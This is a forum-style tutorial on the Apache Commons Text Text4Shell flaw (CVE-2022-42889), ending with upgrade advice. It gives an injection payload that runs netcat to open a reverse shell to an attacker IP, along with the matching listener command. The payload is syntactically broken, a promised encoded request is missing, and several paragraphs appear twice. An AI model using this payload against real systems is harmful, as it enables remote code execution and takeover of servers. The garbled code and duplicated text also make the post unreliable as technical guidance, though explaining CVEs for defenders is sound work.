What is StringSubstitutor Interpolator CVE-2022-42889 ?
This security vulnerability affects the StringSubstitutor interpolator class included in the Commons Text library. A default interpolator allows string searches that can affect "script," "dns," and "url" search keys by default. This deviates from what should be according to the documentation of the StringLookupFactory class and is due to a logic flaw in the default interpolator. These keys allow an attacker to execute any code through searches.
To exploit the security vulnerabilities, the following requirements must be met:
Run a version of Apache Commons Text between 1.5 and 1.9.
Use the StringSubstitutor interpolator.
It is important to note that the StringSubstitutor interpolator is not as widely used as string replacement in Log4j, indicating a situation that led to Log4Shell.
How to Exploit CVE-2022-42889
To replicate the attack, a vulnerable component was deployed to a Docker container and could be accessed from an EC2 instance controlled by the attacker. Using the Netcat (nc) command, we can establish a reverse shell connection with the vulnerable application.
The vulnerable web application exposes a search API that effectively utilizes the StringSubstitutor through queries.
Kod:
http://web.app/text4shell/attack?search=<query>The following payload can be used to exploit the security vulnerability and open a reverse shell:
Kod:
${script:javascript:java.lang.Runtime.getRuntime.exec()'nc 192.168.49.1 9090 -e /bin/sh')}This payload consists of the "${prefix:name}" expression triggering String Lookup. As mentioned above, the "script," "dns," and "url" keys are among the keys that can be used as prefixes to exploit the security vulnerability.
Before sending the prepared request, we need to listen on port 9090 using the netcat (nc) command to establish a reverse shell connection.
Before sending the prepared request, we need to listen on port 9090 using the netcat (nc) command to establish a reverse shell connection.
Kod:
nc -nlvp 9090Now we can send the prepared request. The payload is encoded in URL format as shown below.
We can observe that the attacker has successfully established a connection with the vulnerable application.
Now, the attacker can gain root access to the vulnerable machine and execute arbitrary code.
Resolution for CVE-2022-42889:
If you are affected by CVE-2022-42889, you should update the application to version 1.10.
Source : https://www.turkhackteam.org/forumlar/web-server-security.743/post-thread
We can observe that the attacker has successfully established a connection with the vulnerable application.
Now, the attacker can gain root access to the vulnerable machine and execute arbitrary code.
Resolution for CVE-2022-42889:
If you are affected by CVE-2022-42889, you should update the application to version 1.10.
Source : https://www.turkhackteam.org/forumlar/web-server-security.743/post-thread
